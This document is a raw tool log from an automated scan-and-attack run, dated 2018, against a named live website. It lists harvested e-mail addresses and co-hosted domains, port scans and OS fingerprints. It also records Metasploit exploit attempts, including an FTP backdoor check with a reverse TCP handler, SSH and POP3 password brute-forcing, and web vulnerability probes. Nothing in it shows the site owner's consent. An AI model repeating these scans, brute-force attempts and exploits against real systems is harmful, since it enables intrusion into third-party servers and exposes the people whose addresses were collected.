- /_/ scan v0.5.0 - by @michenriksen
- Loaded 0 hosts from /root/aquatone/glmasonica.com/hosts.json
- Probing 0 ports...
- Wrote open ports to file:///root/aquatone/glmasonica.com/open_ports.txt
- Wrote URLs to file:///root/aquatone/glmasonica.com/urls.txt
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ gather v0.5.0 - by @michenriksen
- Processing 0 pages...
- Finished processing pages:
- - Successful : 0
- - Failed : 0
- Generating report...done
- Report pages generated:
- #######################################################################################################################################
- [+] Emails found:
- --------------------------------------------------------------------------------------------------------------------------------------
- No emails found
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- 192.252.149.45:www.glmasonica.com
- [+] Virtual hosts:
- =======================================================================================================================================
- 192.252.149.45 puvesapuertas.com
- 192.252.149.45 www.glmasonica.com
- 192.252.149.45 www.careaction.org.hk
- 192.252.149.45 www.fivethousandyears.org
- 192.252.149.45 www.puvesapuertas.com
- 192.252.149.45 www.mexicanadelubricantes.com.mx
- 192.252.149.45 careaction.org.hk
- [+] List of e-mails found:
- ----------------------------
- glmasonica@intnet.mu
- sales@icmauritius.com
- info@sakoa
- info@sakoa
- sales@icmauritius.com
- #######################################################################################################################################
- PING glmasonica.com (192.252.149.45) 56(84) bytes of data.
- 64 bytes from 192.252.149.45 (192.252.149.45): icmp_seq=1 ttl=44 time=451 ms
- --- glmasonica.com ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 451.921/451.921/451.921/0.000 ms
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:35 EDT
- Nmap scan report for glmasonica.com (192.252.149.45)
- Host is up (0.77s latency).
- Not shown: 460 closed ports, 6 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 3306/tcp open mysql
- Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:36 EDT
- Nmap scan report for glmasonica.com (192.252.149.45)
- Host is up.
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp open|filtered netbios-ns
- 138/udp open|filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Nmap done: 1 IP address (1 host up) scanned in 3.42 seconds
- #######################################################################################################################################
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:36 EDT
- Nmap scan report for glmasonica.com (192.252.149.45)
- Host is up (0.20s latency).
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.96 seconds
- +-------------------------------------------------------+
- | METASPLOIT by Rapid7 |
- +---------------------------+---------------------------+
- | __________________ | |
- | ==c(______(o(______(_() | |""""""""""""|======[*** |
- | )=\ | | EXPLOIT \ |
- | // \\ | |_____________\_______ |
- | // \\ | |==[msf >]============\ |
- | // \\ | |______________________\ |
- | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
- | // \\ | ********************* |
- +---------------------------+---------------------------+
- | o O o | \'\/\/\/'/ |
- | o O | )======( |
- | o | .' LOOT '. |
- | |^^^^^^^^^^^^^^|l___ | / _||__ \ |
- | | PAYLOAD |""\___, | / (_||_ \ |
- | |________________|__|)__| | | __||_) | |
- | |(@)(@)"""**|(@)(@)**|(@) | " || " |
- | = = = = = = = = = = = = | '--------------' |
- +---------------------------+---------------------------+
- =[ metasploit v4.16.49-dev ]
- + -- --=[ 1750 exploits - 1003 auxiliary - 304 post ]
- + -- --=[ 536 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOST => glmasonica.com
- RHOSTS => glmasonica.com
- [-] glmasonica.com:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (glmasonica.com:21).
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.211.1.21:4444
- [*] glmasonica.com:21 - Sending Backdoor Command
- [-] glmasonica.com:21 - Not backdoored
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 opened... running tests...
- # general
- (gen) banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3
- (gen) software: OpenSSH 7.4p1
- (gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) curve25519-sha256 -- [warn] unknown algorithm
- (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
- (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
- (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
- # encryption algorithms (ciphers)
- (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
- `- [info] default cipher since OpenSSH 6.9.
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
- # message authentication code algorithms
- (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 6.2
- (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # algorithm recommendations (for OpenSSH 7.4)
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -hmac-sha2-512 -- mac algorithm to remove
- (rec) -umac-128@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha2-256 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
- (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:37 EDT
- Nmap scan report for glmasonica.com (192.252.149.45)
- Host is up (0.35s latency).
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
- |_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
- |_ssh-brute: ERROR: Script execution failed (use -d to debug)
- | ssh-hostkey:
- | 2048 92:e0:eb:16:64:35:7a:26:99:37:fb:a5:d0:9f:75:9e (RSA)
- |_ 256 33:25:93:99:9b:e4:22:61:af:25:6b:58:67:a7:29:f9 (ED25519)
- |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
- |_ssh-run: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: specialized|WAP
- Running: iPXE 1.X, Linux 2.4.X|2.6.X
- OS CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
- OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
- Network Distance: 1 hop
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 5601.55 ms 192.252.149.45
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 121.78 seconds
- Metasploit Park, System Security Interface
- Version 4.0.5, Alpha E
- Ready...
- > access security
- access: PERMISSION DENIED.
- > access security grid
- access: PERMISSION DENIED.
- > access main security grid
- access: PERMISSION DENIED....and...
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- =[ metasploit v4.16.49-dev ]
- + -- --=[ 1750 exploits - 1003 auxiliary - 304 post ]
- + -- --=[ 536 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- USER_FILE => /BruteX/wordlists/simple-users.txt
- RHOSTS => glmasonica.com
- [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => glmasonica.com
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
- [*] glmasonica.com:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 closed... skipping.
- + -- --=[Port 67 closed... skipping.
- + -- --=[Port 68 closed... skipping.
- + -- --=[Port 69 closed... skipping.
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- #######################################################################################################################################
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: glmasonica.com:80
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 400 Bad Request
- Date: Mon, 16 Apr 2018 02:40:14 GMT
- Server: Apache
- Content-Length: 226
- Connection: close
- Content-Type: text/html; charset=iso-8859-1
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>400 Bad Request</title>
- </head><body>
- <h1>Bad Request</h1>
- <p>Your browser sent a request that this server could not understand.<br />
- </p>
- </body></html>
- HTTP/1.1 400 Bad Request
- Date: Mon, 16 Apr 2018 02:40:16 GMT
- Server: Apache
- Content-Length: 226
- Connection: close
- Content-Type: text/html; charset=iso-8859-1
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>400 Bad Request</title>
- </head><body>
- <h1>Bad Request</h1>
- <p>Your browser sent a request that this server could not understand.<br />
- </p>
- </body></html>
- #######################################################################################################################################
- + -- --=[Checking if X-Content options are enabled on glmasonica.com...
- + -- --=[Checking if X-Frame options are enabled on glmasonica.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on glmasonica.com...
- + -- --=[Checking HTTP methods on glmasonica.com...
- + -- --=[Checking if TRACE method is enabled on glmasonica.com...
- + -- --=[Checking for META tags on glmasonica.com...
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <meta name="Keywords" content="" />
- <meta name="Description" content="" />
- + -- --=[Checking for open proxy on glmasonica.com...
- <body>
- <div id="notice">
- <h1>RESOURCE NOT FOUND</h1>
- <h2><b>google.com</b></h2>
- </div>
- <div>
- server308.com: No site configured at this address.
- </div>
- </body>
- </html>
- + -- --=[Enumerating software on glmasonica.com...
- Server: Apache
- + -- --=[Checking if Strict-Transport-Security is enabled on glmasonica.com...
- + -- --=[Checking for Flash cross-domain policy on glmasonica.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /crossdomain.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking for Silverlight cross-domain policy on glmasonica.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on glmasonica.com...
- + -- --=[Retrieving robots.txt on glmasonica.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /robots.txt was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Retrieving sitemap.xml on glmasonica.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /sitemap.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking cookie attributes on glmasonica.com...
- Set-Cookie: projector=949fea65f1db43f2b5c0369ddc79c6a6; path=/
- + -- --=[Checking for ASP.NET Detailed Errors on glmasonica.com...
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- #######################################################################################################################################
- _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
- (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
- (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
- \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
- \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
- /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
- [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
- ------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [15-04-2018 22:41:29]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-glmasonica.com.txt ]
- [ INFO ][ DORK ]::[ site:glmasonica.com ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.sk ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sa ID: 007843865286850066037:b0heuatvay8 ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 13 ]
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 0 / 13 ]-[22:41:51] [ - ]
- |_[ + ] Target:: [ http://www.glmasonica.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 1 / 13 ]-[22:41:53] [ - ]
- |_[ + ] Target:: [ http://www.glmasonica.com/introduction.php?l=en ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 2 / 13 ]-[22:41:56] [ - ]
- |_[ + ] Target:: [ http://www.glmasonica.com/history_freemasonry.php?l=fr ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 3 / 13 ]-[22:42:01] [ - ]
- |_[ + ] Target:: [ http://glmasonica.com/display/files/programme.pdf ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 4 / 13 ]-[22:42:04] [ - ]
- |_[ + ] Target:: [ http://www.glmasonica.com/faq.php?l=fr ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 5 / 13 ]-[22:42:06] [ - ]
- |_[ + ] Target:: [ http://www.glmasonica.com/history_glm.php?l=fr ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 6 / 13 ]-[22:42:09] [ - ]
- |_[ + ] Target:: [ http://www.glmasonica.com/history_glm.php?l=en ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 7 / 13 ]-[22:42:12] [ - ]
- |_[ + ] Target:: [ http://www.glmasonica.com/history_freemasonry.php?l=en ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 8 / 13 ]-[22:42:14] [ - ]
- |_[ + ] Target:: [ http://www.glmasonica.com/introduction.php?l=fr ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 9 / 13 ]-[22:42:18] [ - ]
- |_[ + ] Target:: [ http://glmasonica.com/display/files/agm_fr.pdf ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 10 / 13 ]-[22:42:21] [ - ]
- |_[ + ] Target:: [ http://www.glmasonica.com/display/files/agminfo_fr.pdf ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 11 / 13 ]-[22:42:26] [ - ]
- |_[ + ] Target:: [ http://glmasonica.com/display/files/agm_en.pdf ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 12 / 13 ]-[22:42:29] [ - ]
- |_[ + ] Target:: [ http://glmasonica.com/display/files/agminfo_en.pdf ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache , IP:192.252.149.45:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [15-04-2018 22:42:29]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-glmasonica.com.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:42 EDT
- Nmap scan report for glmasonica.com (192.252.149.45)
- Host is up (0.45s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 55 guesses in 42 seconds, average tps: 1.5
- |_ ERROR: Failed to connect.
- |_pop3-capabilities: STLS RESP-CODES AUTH-RESP-CODE CAPA USER PIPELINING SASL(PLAIN) UIDL TOP
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP|general purpose
- Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (95%)
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (95%), Linux 2.6.18 (88%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 466.69 ms 192.252.149.45
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 60.11 seconds
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 123 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 161 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- ====================================================================================
- CHECKING FOR WAF
- ====================================================================================
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://glmasonica.com
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 13
- ====================================================================================
- GATHERING HTTP INFO
- ====================================================================================
- ====================================================================================
- CHECKING HTTP HEADERS AND METHODS
- ====================================================================================
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: glmasonica.com:443
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 400 Bad Request
- Date: Mon, 16 Apr 2018 02:44:07 GMT
- Server: Apache
- Content-Length: 362
- Connection: close
- Content-Type: text/html; charset=iso-8859-1
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>400 Bad Request</title>
- </head><body>
- <h1>Bad Request</h1>
- <p>Your browser sent a request that this server could not understand.<br />
- Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />
- Instead use the HTTPS scheme to access this URL, please.<br />
- </p>
- </body></html>
- ====================================================================================
- CHECKING HTTP HEADERS
- ====================================================================================
- + -- --=[Checking if X-Content options are enabled on glmasonica.com...
- + -- --=[Checking if X-Frame options are enabled on glmasonica.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on glmasonica.com...
- + -- --=[Checking HTTP methods on glmasonica.com...
- + -- --=[Checking if TRACE method is enabled on glmasonica.com...
- + -- --=[Checking for META tags on glmasonica.com...
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <meta name="Keywords" content="" />
- <meta name="Description" content="" />
- + -- --=[Checking for open proxy on glmasonica.com...
- + -- --=[Enumerating software on glmasonica.com...
- Server: Apache
- + -- --=[Checking if Strict-Transport-Security is enabled on glmasonica.com...
- + -- --=[Checking for Flash cross-domain policy on glmasonica.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /crossdomain.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking for Silverlight cross-domain policy on glmasonica.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on glmasonica.com...
- + -- --=[Retrieving robots.txt on glmasonica.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /robots.txt was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Retrieving sitemap.xml on glmasonica.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /sitemap.xml was not found on this server.</p>
